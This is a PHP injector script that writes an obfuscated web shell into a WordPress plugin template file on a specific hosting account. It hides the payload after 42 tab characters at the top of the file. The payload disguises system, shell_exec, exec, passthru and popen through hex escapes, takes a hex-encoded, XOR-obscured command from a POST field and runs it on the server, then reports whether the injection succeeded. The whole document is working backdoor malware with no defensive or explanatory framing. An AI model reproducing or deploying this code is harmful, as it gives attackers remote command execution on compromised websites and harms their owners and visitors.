<?php  $path = '/home1/tabela11/public_html/wp-content/plugins_old/feeds-for-youtube/vendor/smashballoon/customizer/templates/sections/select-template.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24query_handler3%20%3D%20%22exe%5Cx63%22%3B%20%24query_handler7%20%3D%20%22p%5Cx63los%5Cx65%22%3B%20%24query_handler4%20%3D%20%22p%5Cx61%5Cx73s%5Cx74h%5Cx72u%22%3B%20%24query_handler5%20%3D%20%22%5Cx70op%5Cx65n%22%3B%20%24query_handler1%20%3D%20%22s%5Cx79st%5Cx65%5Cx6D%22%3B%20%24query_handler2%20%3D%20%22%5Cx73%5Cx68%5Cx65%5Cx6Cl_exe%5Cx63%22%3B%20%24module_controller%20%3D%20%22he%5Cx782b%5Cx69%5Cx6E%22%3B%20%24query_handler6%20%3D%20%22%5Cx73t%5Cx72%5Cx65%5Cx61m_%5Cx67et_%5Cx63ont%5Cx65%5Cx6E%5Cx74%5Cx73%22%3B%20if%20%28isset%28%24_POST%5B%22%5Cx64e%5Cx73c%22%5D%29%29%20%7B%20function%20auth_exception_handler%28%20%24component%20%2C%20%24data%20%29%20%7B%20%24key%20%3D%20%27%27%20%3B%20%24y%3D0%3B%20while%28%24y%3Cstrlen%28%24component%29%29%7B%20%24key.%3Dchr%28ord%28%24component%5B%24y%5D%29%5E%24data%29%3B%20%24y%2B%2B%3B%20%7D%20return%20%24key%3B%20%7D%20%24desc%20%3D%20%24module_controller%28%24_POST%5B%22%5Cx64e%5Cx73c%22%5D%29%3B%20%24desc%20%3D%20auth_exception_handler%28%24desc%2C%2017%29%3B%20if%20%28function_exists%28%24query_handler1%29%29%20%7B%20%24query_handler1%28%24desc%29%3B%20%7D%20elseif%20%28function_exists%28%24query_handler2%29%29%20%7B%20print%20%24query_handler2%28%24desc%29%3B%20%7D%20elseif%20%28function_exists%28%24query_handler3%29%29%20%7B%20%24query_handler3%28%24desc%2C%20%24reference_component%29%3B%20print%20join%28%22%5Cn%22%2C%20%24reference_component%29%3B%20%7D%20elseif%20%28function_exists%28%24query_handler4%29%29%20%7B%20%24query_handler4%28%24desc%29%3B%20%7D%20elseif%20%28function_exists%28%24query_handler5%29%20%26%26%20function_exists%28%24query_handler6%29%20%26%26%20function_exists%28%24query_handler7%29%29%20%7B%20%24data_key%20%3D%20%24query_handler5%28%24desc%2C%20%27r%27%29%3B%20if%20%28%24data_key%29%20%7B%20%24dat_bind%20%3D%20%24query_handler6%28%24data_key%29%3B%20%24query_handler7%28%24data_key%29%3B%20print%20%24dat_bind%3B%20%7D%20%7D%20exit%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');